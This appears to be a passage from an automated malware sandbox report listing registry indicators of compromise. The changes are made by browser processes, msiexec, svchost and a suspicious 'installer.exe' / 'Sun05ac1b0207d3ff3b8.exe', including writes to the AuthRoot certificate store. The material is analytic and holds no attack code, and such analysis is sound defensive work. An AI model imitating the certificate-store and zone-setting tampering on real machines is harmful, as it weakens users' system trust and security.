\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\ = "325" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "241" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mj22.xyz\Total = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "653" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "273" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3c2458c415a8d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\33across.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\ = "207" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d0122b6812a8d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\NumberOfSubdomain = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ad64eef612a8d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\ = "193" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "237" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "241" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "HW" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 408cc93415a8d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\33across.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "853" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "237" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 85a0e9f612a8d701 MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\7289246C77593EBF\2 = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\NumberOfSubdomain = "1" MicrosoftEdgeCP.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Processes:
installer.exeSun05ac1b0207d3ff3b8.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 